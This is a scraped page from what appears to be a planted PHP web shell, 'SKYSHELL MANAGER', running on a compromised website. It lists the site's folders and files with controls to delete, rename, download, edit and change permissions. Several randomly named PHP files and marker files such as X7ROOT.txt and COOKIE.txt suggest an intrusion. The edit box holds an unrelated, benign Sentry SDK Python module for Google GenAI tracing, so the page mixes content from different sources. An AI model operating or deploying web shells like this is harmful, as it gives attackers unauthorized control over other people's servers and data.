📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
12.43 KB
0555
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: __init__.py
from functools import wraps from typing import ( Any, AsyncIterator, Callable, Iterator, List, ) import sentry_sdk from sentry_sdk.ai.utils import get_start_span_function from sentry_sdk.integrations import DidNotEnable, Integration from sentry_sdk.consts import OP, SPANDATA from sentry_sdk.tracing import SPANSTATUS try: from google.genai.models import Models, AsyncModels except ImportError: raise DidNotEnable("google-genai not installed") from .consts import IDENTIFIER, ORIGIN, GEN_AI_SYSTEM from .utils import ( set_span_data_for_request, set_span_data_for_response, _capture_exception, prepare_generate_content_args, ) from .streaming import ( set_span_data_for_streaming_response, accumulate_streaming_response, ) class GoogleGenAIIntegration(Integration): identifier = IDENTIFIER origin = ORIGIN def __init__(self, include_prompts=True): # type: (GoogleGenAIIntegration, bool) -> None self.include_prompts = include_prompts @staticmethod def setup_once(): # type: () -> None # Patch sync methods Models.generate_content = _wrap_generate_content(Models.generate_content) Models.generate_content_stream = _wrap_generate_content_stream( Models.generate_content_stream ) # Patch async methods AsyncModels.generate_content = _wrap_async_generate_content( AsyncModels.generate_content ) AsyncModels.generate_content_stream = _wrap_async_generate_content_stream( AsyncModels.generate_content_stream ) def _wrap_generate_content_stream(f): # type: (Callable[..., Any]) -> Callable[..., Any] @wraps(f) def new_generate_content_stream(self, *args, **kwargs): # type: (Any, Any, Any) -> Any integration = sentry_sdk.get_client().get_integration(GoogleGenAIIntegration) if integration is None: return f(self, *args, **kwargs) _model, contents, model_name = prepare_generate_content_args(args, kwargs) span = get_start_span_function()( op=OP.GEN_AI_INVOKE_AGENT, name="invoke_agent", origin=ORIGIN, ) span.__enter__() span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name) span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "invoke_agent") set_span_data_for_request(span, integration, model_name, contents, kwargs) span.set_data(SPANDATA.GEN_AI_RESPONSE_STREAMING, True) chat_span = sentry_sdk.start_span( op=OP.GEN_AI_CHAT, name=f"chat {model_name}", origin=ORIGIN, ) chat_span.__enter__() chat_span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "chat") chat_span.set_data(SPANDATA.GEN_AI_SYSTEM, GEN_AI_SYSTEM) chat_span.set_data(SPANDATA.GEN_AI_REQUEST_MODEL, model_name) set_span_data_for_request(chat_span, integration, model_name, contents, kwargs) chat_span.set_data(SPANDATA.GEN_AI_RESPONSE_STREAMING, True) chat_span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name) try: stream = f(self, *args, **kwargs) # Create wrapper iterator to accumulate responses def new_iterator(): # type: () -> Iterator[Any] chunks = [] # type: List[Any] try: for chunk in stream: chunks.append(chunk) yield chunk except Exception as exc: _capture_exception(exc) chat_span.set_status(SPANSTATUS.ERROR) raise finally: # Accumulate all chunks and set final response data on spans if chunks: accumulated_response = accumulate_streaming_response(chunks) set_span_data_for_streaming_response( chat_span, integration, accumulated_response ) set_span_data_for_streaming_response( span, integration, accumulated_response ) chat_span.__exit__(None, None, None) span.__exit__(None, None, None) return new_iterator() except Exception as exc: _capture_exception(exc) chat_span.__exit__(None, None, None) span.__exit__(None, None, None) raise return new_generate_content_stream def _wrap_async_generate_content_stream(f): # type: (Callable[..., Any]) -> Callable[..., Any] @wraps(f) async def new_async_generate_content_stream(self, *args, **kwargs): # type: (Any, Any, Any) -> Any integration = sentry_sdk.get_client().get_integration(GoogleGenAIIntegration) if integration is None: return await f(self, *args, **kwargs) _model, contents, model_name = prepare_generate_content_args(args, kwargs) span = get_start_span_function()( op=OP.GEN_AI_INVOKE_AGENT, name="invoke_agent", origin=ORIGIN, ) span.__enter__() span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name) span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "invoke_agent") set_span_data_for_request(span, integration, model_name, contents, kwargs) span.set_data(SPANDATA.GEN_AI_RESPONSE_STREAMING, True) chat_span = sentry_sdk.start_span( op=OP.GEN_AI_CHAT, name=f"chat {model_name}", origin=ORIGIN, ) chat_span.__enter__() chat_span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "chat") chat_span.set_data(SPANDATA.GEN_AI_SYSTEM, GEN_AI_SYSTEM) chat_span.set_data(SPANDATA.GEN_AI_REQUEST_MODEL, model_name) set_span_data_for_request(chat_span, integration, model_name, contents, kwargs) chat_span.set_data(SPANDATA.GEN_AI_RESPONSE_STREAMING, True) chat_span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name) try: stream = await f(self, *args, **kwargs) # Create wrapper async iterator to accumulate responses async def new_async_iterator(): # type: () -> AsyncIterator[Any] chunks = [] # type: List[Any] try: async for chunk in stream: chunks.append(chunk) yield chunk except Exception as exc: _capture_exception(exc) chat_span.set_status(SPANSTATUS.ERROR) raise finally: # Accumulate all chunks and set final response data on spans if chunks: accumulated_response = accumulate_streaming_response(chunks) set_span_data_for_streaming_response( chat_span, integration, accumulated_response ) set_span_data_for_streaming_response( span, integration, accumulated_response ) chat_span.__exit__(None, None, None) span.__exit__(None, None, None) return new_async_iterator() except Exception as exc: _capture_exception(exc) chat_span.__exit__(None, None, None) span.__exit__(None, None, None) raise return new_async_generate_content_stream def _wrap_generate_content(f): # type: (Callable[..., Any]) -> Callable[..., Any] @wraps(f) def new_generate_content(self, *args, **kwargs): # type: (Any, Any, Any) -> Any integration = sentry_sdk.get_client().get_integration(GoogleGenAIIntegration) if integration is None: return f(self, *args, **kwargs) model, contents, model_name = prepare_generate_content_args(args, kwargs) with get_start_span_function()( op=OP.GEN_AI_INVOKE_AGENT, name="invoke_agent", origin=ORIGIN, ) as span: span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name) span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "invoke_agent") set_span_data_for_request(span, integration, model_name, contents, kwargs) with sentry_sdk.start_span( op=OP.GEN_AI_CHAT, name=f"chat {model_name}", origin=ORIGIN, ) as chat_span: chat_span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "chat") chat_span.set_data(SPANDATA.GEN_AI_SYSTEM, GEN_AI_SYSTEM) chat_span.set_data(SPANDATA.GEN_AI_REQUEST_MODEL, model_name) chat_span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name) set_span_data_for_request( chat_span, integration, model_name, contents, kwargs ) try: response = f(self, *args, **kwargs) except Exception as exc: _capture_exception(exc) chat_span.set_status(SPANSTATUS.ERROR) raise set_span_data_for_response(chat_span, integration, response) set_span_data_for_response(span, integration, response) return response return new_generate_content def _wrap_async_generate_content(f): # type: (Callable[..., Any]) -> Callable[..., Any] @wraps(f) async def new_async_generate_content(self, *args, **kwargs): # type: (Any, Any, Any) -> Any integration = sentry_sdk.get_client().get_integration(GoogleGenAIIntegration) if integration is None: return await f(self, *args, **kwargs) model, contents, model_name = prepare_generate_content_args(args, kwargs) with get_start_span_function()( op=OP.GEN_AI_INVOKE_AGENT, name="invoke_agent", origin=ORIGIN, ) as span: span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name) span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "invoke_agent") set_span_data_for_request(span, integration, model_name, contents, kwargs) with sentry_sdk.start_span( op=OP.GEN_AI_CHAT, name=f"chat {model_name}", origin=ORIGIN, ) as chat_span: chat_span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "chat") chat_span.set_data(SPANDATA.GEN_AI_SYSTEM, GEN_AI_SYSTEM) chat_span.set_data(SPANDATA.GEN_AI_REQUEST_MODEL, model_name) set_span_data_for_request( chat_span, integration, model_name, contents, kwargs ) try: response = await f(self, *args, **kwargs) except Exception as exc: _capture_exception(exc) chat_span.set_status(SPANSTATUS.ERROR) raise set_span_data_for_response(chat_span, integration, response) set_span_data_for_response(span, integration, response) return response return new_async_generate_content
Save